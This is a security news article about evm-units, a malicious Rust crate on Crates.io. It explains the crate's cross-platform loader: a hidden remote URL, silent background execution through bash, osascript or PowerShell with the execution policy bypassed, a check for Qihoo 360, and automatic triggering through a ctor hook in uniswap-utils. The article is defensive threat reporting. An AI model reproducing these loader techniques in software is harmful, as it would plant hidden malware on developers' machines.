A malicious Rust crate masquerading as an Ethereum Virtual Machine (EVM) utility has been caught delivering silent, OS-specific payloads to developers’ machines.
The package, named evm-units and authored by “ablerust,” was hosted on Crates.io for roughly eight months and accumulated over 7,000 all-time downloads before being swiftly removed following a report from the Socket Threat Research Team.
At first glance, evm-units appears to offer a benign helper function, get_evm_version(), returning a plausible EVM version number.
Under the hood, however, this call triggers a cross-platform second-stage loader that fetches and executes a remote payload based on the victim’s operating system and the presence of Qihoo 360 antivirus.
Cross-platform loader
The malicious behavior begins when get_evm_version() is invoked. The function decodes a hardcoded, base64-encoded string into a remote URL, which is then passed into an async check() function.
This URL, already flagged as malicious by VirusTotal along with the associated payload hash, serves as the delivery point for the second-stage script.
The crate implements three OS-specific check() variants using Rust’s conditional compilation:
On Linux, the malware downloads a script into the system temp directory as /tmp/init, writes the payload to disk, and executes it in the background via nohup bash with all standard streams nulled.
No windows, logs, or terminal output alert the victim, while the attacker’s script gains complete control to run arbitrary commands or install additional payloads.
On macOS, a similar pattern is used: the payload is saved as init in the temp directory, then quietly executed in the background using osascript wrapped in nohup, again with no visible artifacts to the user. This enables a silent AppleScript-based second stage.
On Windows, the payload is dropped as a PowerShell script (init.ps1) in the temp directory. The code then enumerates running processes to detect Qihoo 360 (qhsafetray.exe).
If Qihoo 360 is absent, the malware generates a VBScript that launches the PowerShell script in a hidden window.
Regardless of antivirus presence, it then runs PowerShell with -ExecutionPolicy Bypass and CREATE_NO_WINDOW, ensuring stealthy execution.
Across all platforms, the use of danger_accept_invalid_certs(true) allows the attacker to use self-signed certificates and rotate infrastructure with minimal friction, undermining defensive TLS inspection.
Crypto-focused supply chain compromise
The explicit check for Qihoo 360, a leading Chinese antivirus product with a substantial market share across Asia, points to a likely regional focus and aligns with a cryptocurrency-theft profile.
The combination of EVM-themed utilities, a benign-looking Uniswap helper dependency, and cross-platform loader behavior strongly suggests targeting of crypto developers or infrastructure.
Security teams are urged to treat all open source dependencies as potential attack surfaces, continuously scan for hidden behaviors such as OS-specific payload downloads, script execution (PowerShell, Bash, AppleScript), and stealthy initialization hooks, and integrate automated dependency protection into CI/CD pipelines to block malicious crates before they reach production.
The risk is amplified by the fact that evm-units was not just a standalone crate. Another package by the same author, uniswap-utils, appears largely legitimate and has over 7,400 all-time downloads.
However, it depends on evm-units and invokes evm_units::get_evm_version() inside a function annotated with #[ctor::ctor]. This causes the malicious function to run automatically at initialization, turning the incident into a classic software supply chain compromise.
This case underscores the growing sophistication of open source malware, especially within cryptocurrency ecosystems.
A single seemingly innocuous version-check function was enough to conceal a cross-platform loader inside widely used Rust crates.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.